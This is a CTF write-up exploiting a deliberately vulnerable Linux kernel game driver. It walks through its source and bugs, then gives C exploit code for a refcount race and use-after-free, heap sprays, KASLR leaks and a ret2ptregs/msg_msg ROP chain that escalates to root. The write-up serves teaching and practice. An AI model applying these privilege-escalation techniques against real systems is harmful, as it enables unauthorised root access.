-rw-r--r-- 1 root root     479 Jul 21 21:49 Dockerfile
-rw-r--r-- 1 root root 8889472 Jul 21 21:49 bzImage
-rw-r--r-- 1 root root 1097121 Sep  8 23:07 initramfs.cpio.gz
-rw-r--r-- 1 root root 3593808 Jul 21 21:49 pow
-rw-r--r-- 1 root root     261 Jul 21 21:49 run.sh
-rw-r--r-- 1 root root     239 Jul 21 21:49 service.conf
-rw-r--r-- 1 root root     383 Jul 21 21:49 setup.py

dist/src:
total 36
-rw-r--r-- 1 root root  6170 Jul 21 21:49 art.h
-rw-r--r-- 1 root root  9946 Jul 21 21:49 client.c
-rw-r--r-- 1 root root 13163 Jul 21 21:49 server.c

From run.sh, we find that the standard protections SMAP, SMEP, KPTI and KASLR are enabled.

qemu-system-x86_64 \
    -m 1024M \
    -kernel /home/ctf/bzImage \
    -initrd /home/ctf/initramfs.cpio.gz \
    -nographic \
    -monitor none \
    -no-reboot \
    -cpu kvm64,+smep,+smap \
    -smp 4 \
    -append "console=ttyS0 kaslr kpti=1 quiet panic=1"

The challenge driver is a game server. Players can interact with the server via ioctl commands. There are various game mechanics, including viewing stats, buying/using items and fighting bosses. The objective of the game appears to be defeating the dragon.

The source code is almost 700 LOCs so I’ll explain it in parts, beginning with the skeleton of the driver. Upon loading the driver, krpg_init() is triggered. This registers the game server device with misc_register() and initializes global variables. The device’s open handler rpg_open() makes use of mutex_lock()/mutex_unlock() and atomic_read() to ensure that there is at most one active connection. The driver uses multiple mutexes, all defined at the top of the file. PLAYER_MUTEX is locked for actions involving player attributes like health or equipped item; INVENTORY_MUTEX is locked for actions that manipulate the player’s inventory, such as acquiring new items; MOB_MUTEX is locked for actions that affect the enemy bosses, such as attacking them; ETC_MUTEX is a miscellaneous mutex used for various actions, such as in rpg_open() to prevent concurrent open()s.

[...] // includes

static DEFINE_MUTEX(PLAYER_MUTEX);
static DEFINE_MUTEX(INVENTORY_MUTEX);
static DEFINE_MUTEX(MOB_MUTEX);
static DEFINE_MUTEX(ETC_MUTEX);

[...] // helper functions

typedef struct
{
	char name[0x10];
	unsigned long size;
} feedback_header_t;

typedef struct
{
	unsigned long health;
	weapon_t *equipped;
	unsigned long gold;
} player_t;

typedef struct
{
	char name[0x10];
	unsigned long health;
	unsigned long max_health;
	unsigned long attack;
} mob_t;

/*Global Variables*/
player_t player = {
	.health = 10,
	.equipped = NULL,
	.gold = 0,
};

mob_t slime = {
	.name = "SLIME",
	.health = 5,
	.max_health = 5,
	.attack = 1,
};

mob_t wolf = {
	.name = "WOLF",
	.health = 30,
	.max_health = 30,
	.attack = 3,
};

mob_t dragon = {
	.name = "DRAGON",
	.health = 100,
	.max_health = 100,
	.attack = 50,
};

mob_t *mobs[3];
feedback_header_t *feedback;
int8_t cur_mob;
atomic_t clients_connected;
atomic_t in_battle;
atomic_t dragon_killed;

[...] // inventory functions

[...] // i/o functions

static int rpg_release(struct inode *inode, struct file *filp)
{
	atomic_dec(&clients_connected);
	return 0;
}

static int rpg_open(struct inode *inode, struct file *filp)
{

	// Ensure that only one client is connected at a time!
	mutex_lock(&ETC_MUTEX);
	if (atomic_read(&clients_connected) > 0)
	{
		mutex_unlock(&ETC_MUTEX);
		return -ENODEV;
	}

	atomic_inc(&clients_connected);
	mutex_unlock(&ETC_MUTEX);

	return 0;
}

/*Initialization and Cleanup Code*/
static struct file_operations module_fops = {
	.owner = THIS_MODULE,
	.open = rpg_open,
	.unlocked_ioctl = rpg_ioctl,
	.release = rpg_release,
};

static struct miscdevice misc_dev = {
	.minor = MISC_DYNAMIC_MINOR,
	.name = DEVICE_NAME,
	.fops = &module_fops,
};

static int __init krpg_init(void)
{

	if (misc_register(&misc_dev))
	{
		printk("[!] failed to register krpg device!");
		return -EBUSY;
	}
	printk("[-] krpg device registered!");

	cur_mob = 0;
	atomic_set(&in_battle, 0);
	atomic_set(&clients_connected, 0);
	atomic_set(&dragon_killed, 0);
	mobs[0] = &slime;
	mobs[1] = &wolf;
	mobs[2] = &dragon;

	return 0;
}

static void __exit krpg_destroy(void)
{
	misc_deregister(&misc_dev);
	printk("[-] krpg device unregistered!");
}

module_init(krpg_init);
module_exit(krpg_destroy);

The driver uses the player_t struct and the mob_t struct to represent the player and the enemy bosses, or mobs, respectively. While the slime and wolf mobs can be easily defeated, the dragon has an extremely high health and damage stat and cannot be defeated normally.

The device uses rpg_ioctl() to handle ioctl requests. We will revisit some of the interesting commands later.

static long rpg_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	int i;

	switch (cmd)
	{
	case QUERY_PLAYER_STATS:
		copy_to((void *)arg, (void *)&player, sizeof(player_t));
		break;
	case QUERY_WEAPON_STATS:
		if (player.equipped != NULL)
		{
			copy_to((void *)arg, (void *)player.equipped, sizeof(weapon_t));
			return 0;
		}
		else
		{
			return 1;
		}
	case QUERY_MOB_STATS:
		mutex_lock(&MOB_MUTEX);
		mutex_lock(&ETC_MUTEX);
		if (!get_battle_status())
			return 1;
		if (cur_mob < 3)
		{
			copy_to((void *)arg, (void *)mobs[cur_mob], sizeof(mob_t));
		}
		else
		{
			cur_mob = 0;
			mobs[0]->health = 5;
			copy_to((void *)arg, (void *)mobs[0], sizeof(mob_t));
		}
		mutex_unlock(&ETC_MUTEX);
		mutex_unlock(&MOB_MUTEX);
		break;
	case VISIT_SHOP:
		if (get_battle_status())
			return 1;
		return visit_shop(arg);
	case LIST_INVENTORY:
		return list_inventory_items((void *__user)arg);
	case MINE_GOLD:
		if (!get_battle_status())
			return mine_gold();
		break;
	case QUERY_BATTLE_STATUS:
		return get_battle_status();
	case START_BATTLE:
		if (get_battle_status())
		{
			return -1;
		}
		set_battle_status(1);
		return 0;
	case ATTACK:
		if (get_battle_status())
			return attack_boss();
		break;
	case HEAL:
		return use_health_potion();
	case RUN:
		set_battle_status(0);
		break;
	case USE_ITEM:
		return use_item(arg);
	case REMOVE_ITEM:
		return remove_item(arg);
	case CREEPER_EXPLODED:
		died();
		break;
	case FEEDBACK:
		return get_feedback((char *__user)arg);
	case RESET:
		mutex_lock(&ETC_MUTEX);
		mutex_lock(&MOB_MUTEX);
		i = atomic_read(&dragon_killed);
		if (i)
		{
			// only the dragon killer is worthy of revisiting his previous opponents.
			cur_mob -= 1;
			slime.health = 5;
			wolf.health = 30;
			dragon.health = 100;
		}
		mutex_unlock(&ETC_MUTEX);
		mutex_unlock(&MOB_MUTEX);
		return 0;
	default:
		return -1;
		break;
	}
	return 0;
}

We can already spot a vulnerability in the 'RESET' handler. 'cur_mob' is decremented without any checks. This variable is used throughout the program as an array index. Thus, it is possible to trigger an OOB array access with this handler. However, we can only use this functionality after defeating the dragon.

The game also has an inventory system which uses the linux kernel’s implementation of linked lists. inventory is initialized with LIST_HEAD(), which is a linked list of inventoryEntry_t structs. Each entry stores metadata in a inventoryHeader_t *header and references the inventory item itself in void *item. This item can be a weapon (weapon_t) or a potion (potion_t). There is only a single type of either item – a rusty sword or a potion.

/*Items, Inventory System*/

LIST_HEAD(inventory);

// ITEM TYPES
#define WEAPON 1
#define CONSUM 2

// UUIDS
#define RUSTY_SWORD 0x1337
#define POTION 0x1338

typedef struct
{
	uint16_t UUID;
	uint8_t itemType;
	uint8_t refCount;
} inventoryHeader_t;

typedef struct
{
	struct list_head next;
	inventoryHeader_t *header; // metadata
	void *item;				   // the item itself. weapon_t | potion_t
} inventoryEntry_t;

typedef struct
{
	char name[0x18];
	unsigned long attack;
} weapon_t;

typedef struct
{
	char name[0x20];
	unsigned long heal;
} potion_t;

Next, let’s move on to the implementations of the ioctl handlers. We can purchase items to add to our inventory using the VISIT_SHOP command. This calls visit_shop(), which calls add_item() to add the inventory item to the inventory list. If the item is already in the player’s inventory, add_item() increments its reference count refCount to a limit of 255. If the item is not in the player’s inventory, it calls populate_item() to create a new inventory entry for it. None of these functions have any vulnerabilities.

inventoryEntry_t *populate_item(uint16_t UUID)
{
	inventoryHeader_t *header = kzalloc(sizeof(inventoryHeader_t), GFP_ATOMIC);
	inventoryEntry_t *entry = kzalloc(sizeof(inventoryEntry_t), GFP_ATOMIC);
	entry->header = header;
	header->UUID = UUID;
	header->refCount = 1;

	switch (UUID)
	{
	case RUSTY_SWORD:
		weapon_t *rustySword = kzalloc(sizeof(weapon_t), GFP_ATOMIC);
		entry->item = rustySword;
		rustySword->attack = 1;
		header->itemType = WEAPON;
		strcpy((char *)&(rustySword->name), "Rusty Sword");
		break;
	case POTION:
		potion_t *potion = kzalloc(sizeof(potion_t), GFP_ATOMIC);
		entry->item = potion;
		potion->heal = 1;
		header->itemType = CONSUM;
		strcpy((char *)&(potion->name), "Health Potion");
		break;
	default:
		panic("Error has occurred! Exiting!");
	}

	return entry;
}

// Add item to inventory. Either new entry, or increments refcount
int add_item(uint16_t UUID)
{
	inventoryEntry_t *item;
	struct list_head *ptr;
	mutex_lock(&INVENTORY_MUTEX);
	list_for_each(ptr, &inventory)
	{
		item = list_entry(ptr, inventoryEntry_t, next);
		if (item->header->UUID == UUID)
		{
			if (item->header->refCount < 255)
			{
				printk("[*] increment refcount for uuid %d!\n", UUID);
				item->header->refCount += 1;
				mutex_unlock(&INVENTORY_MUTEX);
				return 0;
			}
			mutex_unlock(&INVENTORY_MUTEX);
			return 2;
		}
	}

	item = populate_item(UUID);
	list_add(&(item->next), &inventory);
	mutex_unlock(&INVENTORY_MUTEX);
	return 0;
}

int visit_shop(unsigned int cmd)
{
	switch (cmd)
	{
	case 1:
		mutex_lock(&PLAYER_MUTEX);
		if (player.gold < 1)
		{
			mutex_unlock(&PLAYER_MUTEX);
			return 1;
		}
		player.gold -= 1;
		mutex_unlock(&PLAYER_MUTEX);
		return add_item(RUSTY_SWORD);
	case 2:
		mutex_lock(&PLAYER_MUTEX);
		if (player.gold < 5)
		{
			mutex_unlock(&PLAYER_MUTEX);
			return 1;
		}
		player.gold -= 5;
		mutex_unlock(&PLAYER_MUTEX);
		return add_item(POTION);
	default:
		return 0;
	}
	return 0;
}

We can use the 'MINE' command to obtain 5 gold. We can do this as many times as needed, allowing us to purchase any number of items.

The USE_ITEM and HEAL commands allow the player to interact with their items. The former calls use_item(), which either equips a weapon or uses a health potion depending on its argument. The latter calls use_health_potion, which heals the player back to 10 health. This also decrements the potion’s reference count refCount and performs garbage collection with init_garbage_collection() (shown in the next code snippet).

static int use_health_potion(void)
{
	inventoryEntry_t *item;
	struct list_head *ptr;
	list_for_each(ptr, &inventory)
	{
		item = list_entry(ptr, inventoryEntry_t, next);
		if (item->header->UUID == POTION)
		{
			mutex_lock(&INVENTORY_MUTEX);
			mutex_lock(&PLAYER_MUTEX);
			item->header->refCount -= 1;
			init_garbage_collection();
			player.health = 10;
			mutex_unlock(&INVENTORY_MUTEX);
			mutex_unlock(&PLAYER_MUTEX);
			return player.health;
		}
	}
	mutex_unlock(&INVENTORY_MUTEX);
	return 0;
}

static int equip_weapon(inventoryEntry_t *item)
{
	mutex_lock(&PLAYER_MUTEX);
	if (item->header->refCount > 0)
		player.equipped = item->item;
	mutex_unlock(&PLAYER_MUTEX);
	return 0;
}

static int use_item(int UUID)
{
	inventoryEntry_t *item;
	struct list_head *ptr;
	list_for_each(ptr, &inventory)
	{
		item = list_entry(ptr, inventoryEntry_t, next);
		if (item->header->UUID == UUID)
		{
			if (item->header->itemType == WEAPON)
			{
				return equip_weapon(item);
			}
			else if (UUID == POTION)
			{
				if (use_health_potion())
					return 0;
				return 1;
			}
		}
	}
	return 1;
}

void init_garbage_collection(void)
{
	int done;
	inventoryEntry_t *item;
	struct list_head *ptr;

	while (1)
	{
		done = 1;
		ptr = NULL;
		list_for_each(ptr, &inventory)
		{
			item = list_entry(ptr, inventoryEntry_t, next);
			if (item->header->refCount <= 0)
			{
				kfree(item->item);
				list_del(ptr);
				done = 0;
				break;
			}
		}
		if (done)
		{
			break;
		}
	}
}

'init_garbage_collection()' iterates through the player's inventory and frees any items with zero references. This occurs after a player consumes all their potions.

There is a major vulnerability in the use_health_potion() function. It acquires the INVENTORY_MUTEX if it finds a potion in the player’s inventory and releases it after performing garbage collection. This is a minor vulnerability as the mutex should be acquired before iterating through the inventory. However, the bigger issue is that the mutex is released at the end of the function without matching acquisition. We can exploit this to free INVENTORY_MUTEX while other functions are holding it, entirely compromising the device’s ownership model.

A less obvious vulnerability is the potential UAF in equip_weapon(). The function sets the player’s equipped item to the specified item, the rusty sword. However, there is no guarantee on the sword’s lifetime, nor does equipping the sword change its ownership. If we can decrease the sword’s reference count to zero, it will be freed by init_garbage_collection(), leaving a dangling reference in player.equipped while other game functions continue to access it.

static int attack_boss(void)
{
	mutex_lock(&ETC_MUTEX);
	mutex_lock(&PLAYER_MUTEX);
	mutex_lock(&MOB_MUTEX);
	if (player.equipped != NULL)
	{
		mobs[cur_mob]->health -= player.equipped->attack;
[...]

An example of how the program uses 'player.equipped'. It does not first check that the weapon has not been freed.

Another way of affecting items’ reference count is with the REMOVE_ITEM command, which calls remove_item().

static int remove_item(int UUID)
{
	inventoryEntry_t *item;
	struct list_head *ptr;
	mutex_lock(&INVENTORY_MUTEX);
	list_for_each(ptr, &inventory)
	{
		item = list_entry(ptr, inventoryEntry_t, next);
		if (item->header->UUID == UUID)
		{
			if (item->header->refCount > 1)
			{
				item->header->refCount -= 1;
				init_garbage_collection();
				mutex_unlock(&INVENTORY_MUTEX);
				return 0;
			}
			break;
		}
	}
	mutex_unlock(&INVENTORY_MUTEX);
	return 1;
}

However, this function only decreases the item’s reference count if it is greater than one. This means that we can reduce the sword’s reference count to a minimum of one using this function. This is not enough to trigger the UAF.

There are actually other minor bugs in the driver, mostly to do with the improper iteration of the inventory linked list. However, exploiting bugs only produces a kernel panic.

It is also worth noting that the FEEDBACK and RESET commands are gated behind defeating the dragon, with the latter providing an array OOB access. Clearly, we need to find a way to defeat the dragon and abuse these two commands. Under normal circumstances, the player will die to the dragon in a single turn as the rusty sword only does a single point of damage. If we can trigger the UAF on the weapon item (weapon_t), we can possibly overwrite its attack property with a large value, allowing us to defeat the dragon.

typedef struct
{
	char name[0x18];
	unsigned long attack;
} weapon_t;

In order to trigger the UAF, we need to free the weapon_t, which only happens in init_garbage_collection(). That function requires the item’s reference count to zero, which cannot be achieved with remove_item() alone. However, recall that the vulnerability in use_health_potion() allows us to freely unlock the INVENTORY_MUTEX. We can exploit this in order to cause concurrent modification to the reference count. It is difficult to trigger a TOCTOU race in remove_item() as there are no opportunities for context switches between the check and the use.

[...]
	if (item->header->refCount > 1)
	{
		item->header->refCount -= 1;
[...]

Instead, we will target add_item().

int add_item(uint16_t UUID)
{
	inventoryEntry_t *item;
	struct list_head *ptr;
	mutex_lock(&INVENTORY_MUTEX);
	list_for_each(ptr, &inventory)
	{
		item = list_entry(ptr, inventoryEntry_t, next);
		if (item->header->UUID == UUID)
		{
			if (item->header->refCount < 255)
			{
				printk("[*] increment refcount for uuid %d!\n", UUID);
				item->header->refCount += 1;
[...]

After checking that the item’s refCount is less than 255, it calls printk() before incrementing the refCount. This makes it possible for two threads to call add_item() and successfully race the TOCTOU. Since refCount is a uint8_t, it is easy to overflow its value to zero.

While the device tries to limit the number of active player connections by only allowing a single open file descriptor, we can simply duplicate the file descriptor across threads. The following exploit successfully overflows the equipped sword’s reference count to zero. We use two threads to increment refCount at the same time, while a third thread unlocks INVENTORY_MUTEX to enable the race.

int open_game()
{
    int fd = open("/dev/kRPG", O_RDWR);
    if (fd == -1)
    {
        fatal("[!] Failed to open misc device kRPG!");
        return -1;
    }
    printf("Device opened successfully: fd=%d\n", fd);
    return fd;
}

void payload_racer(int fd)
{
    for (int i = 0; i < 3; i++)
    {
        shop(fd, 1); // buy sword
    }
}

void payload_race_helper(int fd)
{
    for (int i = 0; i < 1000; i++)
    {
        heal(fd); // unlock mutex
    }
}

int do_race(int fd1, int fd2, int fd3)
{
    int starter_num = 250;
    user_copy_of_items items;
    list_inventory(fd1, &items);
    assert(items.refCount == 1);

    for (int i = 0; i < starter_num - 1; i++)
    {
        shop(fd1, 1); // start with starter_num swords
    }
    list_inventory(fd1, &items);

    // Create threads to perform IOCTL calls concurrently
    pthread_t threads[3];
    pthread_create(&threads[0], NULL, payload_racer, &fd1);
    pthread_create(&threads[1], NULL, payload_racer, &fd2);
    pthread_create(&threads[2], NULL, payload_race_helper, &fd3);

    // Wait for threads to finish
    pthread_join(threads[0], NULL);
    pthread_join(threads[1], NULL);
    pthread_join(threads[2], NULL);

    // Use LIST_INVENTORY command to check the refcount
    list_inventory(fd1, &items);
    if (items.refCount == 0)
    {
        puts("Race condition hit!");
        printf("UUID: %hd, Name: %s, Refcount: %hhu\n", items.UUID, items.name, items.refCount);
        return 0;
    }
    else
    {
        // Fail. Reset the inventory.
        for (int i = 0; i < items.refCount - 1; i++)
        {
            remove_item(fd1, 0x1337);
        }
        list_inventory(fd1, &items);
        assert(items.refCount == 1);
        return 1;
    }
}

int main() {
    int fd = open_game();

    // Duplicate the file descriptor
    int dup_fd = dup(fd);
    if (dup_fd < 0)
    {
        perror("Failed to duplicate file descriptor");
        close(fd);
        exit(EXIT_FAILURE);
    }
    // Dupe again
    int dup_fd2 = dup(fd);
    if (dup_fd2 < 0)
    {
        perror("Failed to duplicate file descriptor");
        close(fd);
        exit(EXIT_FAILURE);
    }

    /* Pre-payload */
    for (int i = 0; i < 30000; i++)
    {
        mine(fd); // Obtain gold for purchasing items later.
    }

    shop(fd, 1); // Purchase the sword
    use_item(fd, 0x1337); // Equip the sword

	int race_res = 1;
    while (race_res)
    {
        race_res = do_race(fd, dup_fd, dup_fd2);
    }

	// Purchase 2 potions
    shop(fd, 2);
    shop(fd, 2);
    heal(fd); // Use a potion, triggering the kfree in garbage collection
}

After we successfully overflow the sword’s reference count to zero, we purchase two potions and consume one with the HEAL command. This calls use_health_potion(), which triggers the kfree() on the sword, giving us a UAF. Note that we make sure not to purchase any potions prior to the race completion as that will cause use_health_potion() to acquire the mutex as well.

With our UAF on sword, our next objective is to kill the dragon. This is achievable by causing an allocation at the same address with a large value overlapping with the attack member. From ptr-yudai’s collection of kernel structs, the shm_file_data struct looks like a good choice. It is size 0x20, the same as the weapon_t struct, and contains kernel pointers at offsets 0x08, 0x10 and 0x18. That last kernel pointer overlaps with the attack member, giving us an extremely large attack stat. We can use a heap spray to coax the memory allocator into servicing the shm_file_data allocation with the freed weapon_t struct chunk.

    // spray shmem structures
    puts("Spraying shmem!");
    int shmid;
    char *shmaddr;
    for (int i = 0; i < 100; i++)
    {
        if ((shmid = shmget(IPC_PRIVATE, 100, 0600)) == -1)
        {
            perror("shmget error");
            exit(-1);
        }
        shmaddr = shmat(shmid, NULL, 0);
        if (shmaddr == (void *)-1)
        {
            perror("shmat error");
            exit(-1);
        }
    }
    weapon_t weapon;
    query_weapon_stats(fd, &weapon); // Use QUERY_WEAPON_STATS command
    printf("Attack: %lu, Name: %s\n", weapon.attack, weapon.name);
    assert(weapon.attack > 1); // else spray failed

Now, we have a strong weapon that we can use to defeat the dragon. Before doing that, let’s use this opportunity to obtain some leaks. The QUERY_WEAPON_STATS command copies the memory of player’s equipped weapon into userspace. This means we can read all 0x20 bytes of its memory which now contain multiple kernel pointers after the UAF.

    unsigned long shm_leak1 = *(unsigned long *)(&weapon.name[0x00]);
    unsigned long shm_leak2 = *(unsigned long *)(&weapon.name[0x08]);
    unsigned long shm_leak3 = *(unsigned long *)(&weapon.name[0x10]);
    printf("[Pwn] Shm leaks: %lx, %lx, %lx\n", shm_leak1, shm_leak2, shm_leak3);
    unsigned long kernel_base = shm_leak2 - 0xffffffffb7025840 + 0xffffffffb5600000;
    printf("[Pwn] Kbase: %lx\n", kernel_base);

The pointer at offset 0x08 is the struct’s ns member, which points into the kernel’s data area. This gives us a kernel base leak, defeating KASLR.

So far, we have been using different variants of the query ioctl command. None of them are vulnerable in isolation except for QUERY_PLAYER_STATS. This copies the entire player struct into userspace memory. Since the struct includes the weapon_t *equipped pointer, which points to the currently equipped weapon allocated in the kernel heap, we can use it to leak a kernel heap address. We will use this leak for heap-fu later.

typedef struct
{
	unsigned long health;
	weapon_t *equipped;
	unsigned long gold;
} player_t;

player_t player = {
	.health = 10,
	.equipped = NULL,
	.gold = 0,
};

static long rpg_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
[...]
	case QUERY_PLAYER_STATS:
		copy_to((void *)arg, (void *)&player, sizeof(player_t));
		break;

The driver defines the 'copy_to' and 'copy_from' helper functions. These are simply wrappers on the unchecked '_copy_to_user' and '_copy_from_user' functions.

    player_t player;
    query_player_stats(fd, &player);
    void *weapon_leak = player.equipped;
    printf("weapon leak (kheap): %p\n", weapon_leak);

Leaking kheap.

Now, let’s defeat the dragon.

void kill_dragon(int fd)
{
    assert(ioctl(fd, START_BATTLE) == 0);
    assert(ioctl(fd, ATTACK) == 0);
    assert(ioctl(fd, ATTACK) == 0);
    assert(ioctl(fd, ATTACK) == 1337);
}

int main() {
[...]
	kill_dragon(fd);
}

This grants us access to the FEEDBACK and RESET commands.

static int get_feedback(char *__user buf)
{
	feedback_header_t tmp;

	mutex_lock(&ETC_MUTEX);
	// player can only feedback after killing the dragon!
	if (!atomic_read(&dragon_killed) || buf == NULL)
	{
		return 1;
	}

	copy_from((void *)&tmp, buf, sizeof(feedback_header_t));

	if (feedback == NULL)
	{
		feedback = kzalloc(sizeof(feedback_header_t) + tmp.size, GFP_KERNEL_ACCOUNT);
		memcpy((void *)feedback, (void *)&tmp, sizeof(feedback_header_t));
	}

	if (tmp.size > feedback->size)
		return 1;

	copy_from((void *)feedback + sizeof(feedback_header_t), buf + sizeof(feedback_header_t), tmp.size);
	mutex_unlock(&ETC_MUTEX);
	return 0;
}

static long rpg_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
[...]
	case FEEDBACK:
		return get_feedback((char *__user)arg);
[...]

The function reads a tmp.size from the user, allocating a heap buffer of that size with kzalloc(). Then, the function copies exactly tmp.size bytes into the heap buffer. If the feedback struct already exists, the function will copy the user’s input into the buffer, checking that the number of bytes copied does not exceed the buffer’s size. This function has no vulnerabilities.

There is actually a possible integer overflow in kzalloc(sizeof(feedback_header_t) + tmp.size) but this is not practically exploitable.

Next, let’s take a look at the RESET handler in greater detail.

mob_t *mobs[3];
feedback_header_t *feedback;
int8_t cur_mob;

static int attack_boss(void)
{
	mutex_lock(&ETC_MUTEX);
	mutex_lock(&PLAYER_MUTEX);
	mutex_lock(&MOB_MUTEX);
	if (player.equipped != NULL)
	{
		mobs[cur_mob]->health -= player.equipped->attack;
		if (player.equipped->attack >= mobs[cur_mob]->health)
[...]
}

static long rpg_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
[...]
	case RESET:
		mutex_lock(&ETC_MUTEX);
		mutex_lock(&MOB_MUTEX);
		i = atomic_read(&dragon_killed);
		if (i)
		{
			// only the dragon killer is worthy of revisiting his previous opponents.
			cur_mob -= 1;
			slime.health = 5;
			wolf.health = 30;
			dragon.health = 100;
		}
		mutex_unlock(&ETC_MUTEX);
		mutex_unlock(&MOB_MUTEX);
		return 0;

As mentioned earlier, we can decrement cur_mob past zero, leading to an OOB array access when it is used to index mobs. An instance of this is in attack_boss(), where the mob at the index cur_mob is subject to the player’s attack.

Analyzing the driver’s memory layout in a decompiler, we find that the layout is structured so that mobs[-2] == feedback and mobs[-2]->health == feedback->size. This means that by decrementing cur_mob to -2 and attacking the mob using the ATTACK command, we can decrement feedback->size. Since our prior UAF has overwritten our sword’s attack stat with a large value, this will cause feedback->size to underflow. Subsequently, when we try to write to the feedback struct with get_feedback(), the driver will read the fake size, allowing us to write OOB on the heap-allocated buffer!

int main() {
[...]
	// Create feedback struct
	assert(give_feedback(fd, "BBBB", 0x20 - sizeof(feedback_header_t)) == 0);

    for (int i = 0; i < 5; i++)
    {
        reset(fd);
    }
    // cur_mob == -2, mobs[cur_mob] == feedback

    assert(ioctl(fd, ATTACK) == 0); // underflow feedback->size

A unbounded OOB heap write is an extremely strong primitive coupled with the leaks we have. At this point, we can use a variety of exploit strategies. I opted for the well-documented seq_operation to ret2ptregs technique. I will briefly outline the technique here.

This attack has two parts, RIP control and KROP. In order to gain RIP control, we want to overwrite the function pointers in the seq_operations struct.

struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};

This struct is of size 0x20 and contains four function pointers. We can cause an allocation of this struct with open("/proc/self/stat", O_RDONLY). The start function pointer is called when we perform read on its file descriptor. So, our strategy is as follows: spray the heap with the struct, use the heap OOB write to overwrite start with our target, trigger execution of our target by calling read on the sprayed file descriptors.

int main() {
[...]
	// Ensure that the feedback struct is allocated with the same size as seq_operations
    assert(give_feedback(fd, "BBBB", 0x20 - sizeof(feedback_header_t)) == 0);
    
[...]
    puts("spraying seq_operations");
    int spray[800] = {0};
    for (int i = 0; i < 800; i++)
    {
        if ((spray[i] = open("/proc/self/stat", O_RDONLY)) == -1)
        {
            exit(-1);
        }
    }

    TARGET = 0x4141414141414141;
    long *exp = malloc(0x20);
    exp[1] = TARGET;
    // overflow feedback, overwriting the start pointer with TARGET
    assert(give_feedback(fd, (char *)exp, 0x10) == 0);

Successfully controlling RIP.

The seq_operation attack is insufficient on its own as we do not have control over any of the registers. This is where ret2ptregs comes in. When a program performs a syscall, the flow of execution is transferred to the kernel. The kernel pushes all the user’s registers onto the kernel stack to form the pt_regs structure.

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};

By placing specific values in the registers at the time of the syscall, we can craft a ROP chain within the struct. This attack usually uses the registers r15 to r10 to form a 64 byte long ROP payload. This ROP chain would be constructed at the bottom of the kernel stack, which is far from the stack pointer at the point of RIP control with seq_operations. Hence, we need to use a add rsp, X gadget in order to pop the stack pointer into our crafted ROP chain. The exact increment can be found empirically. I used ROPgadget to find the following gadget which perfectly jumps to our ROP chain:

0xffffffff810c535b: add rsp, 0x190 ; pop rbx ; pop r12 ; pop rbp ; jmp 0xffffffff82002240
// 0xffffffff82002240: ret;

Tip: While ropr is often faster at finding gadgets, ROPgadget usually finds more gadgets. Furthermore, I had to increase the search depth with --depth 15 for ROPgadget to find this gadget. The default search depth will not turn up any results.

At this point, Nspace’s Kernote write-up covers the privilege escalation ROP chain:

r15: 0xffffffff81075c4c: pop rdi; ret
r14: 0xffffffff8266b780: &init_cred
r13: 0xffffffff810c9dd5: commit_creds
r12: 0xffffffff810761da: pop rcx; ret
rbp: < address of our code in userspace >
rbx: 0xffffffff8107605a: pop r11; ret
r11: < valid rflags value >
r10: 0xffffffff81c00109: return from syscall

This would be the end of the challenge for most people. However, I couldn’t get the ROPchain to work during the CTF. Instead, I opted to perform a stack pivot and write my ROP chain elsewhere in memory. This exploit path is actually an unnecessary detour but I will explain it for veracity.

I used ret2ptregs to run the following ROP chain:

r15: pop rsp; ret
r14: < stack pivot address >

This would pivot the kernel stack into the address specified in r14. Prior to this, we need to have written our full ROP chain to that address.

A common way of writing arbitrary content to the heap is by using the msg_msg struct. We can spray the heap with msg_msg structs containing our desired ROP chain. With the heap leak earlier, we can calculate the struct’s address using some heap-fu.

unsigned long user_cs, user_ss, user_rsp, user_rflags;
static void save_state()
{
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;");
    puts("[*] Saved state");
}

#define NUM_SPRAYS 2000
#define SPRAY_SIZE 256 // Adjust based on your target

int alloc_msg(void)
{
    int msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
    if (msqid < 0)
    {
        perror("msgget");
        exit(1);
    }
    return msqid;
}

void spray_msg(int msqid, void *buf, size_t size)
{
    struct
    {
        long mtype;
        char mtext[size];
    } msg;

    msg.mtype = 1;
    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi_ret;
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode;
    *rop++ = 0x0;
    *rop++ = 0x0;
    *rop++ = (uint64_t)getRootShell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_rsp;
    *rop = user_ss;

    if (msgsnd(msqid, &msg, size, 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

int spray_msgmsg(void)
{
    int msqids[NUM_SPRAYS];
    // Allocate message queues
    for (int i = 0; i < NUM_SPRAYS; i++)
    {
        msqids[i] = alloc_msg();
    }

    for (int i = 0; i < NUM_SPRAYS; i++)
    {
        spray_msg(msqids[i], 0, SPRAY_SIZE);
    }

    return 0;
}

int main() {
	save_state(); // save registers for ROP later
[...]
	spray_msgmsg();
    sleep(2);

	// Heap-fu
	rop_addr = ((size_t)weapon_leak - 0x138170);
    rop_addr = rop_addr - (rop_addr % 0x1000);
    rop_addr += 0x400 * 2 + 0x30;
    printf("Guessing rop_addr: 0x%lx\n", rop_addr);

	for (int i = 0; i < 800; i++)
    {
        char buf[32];
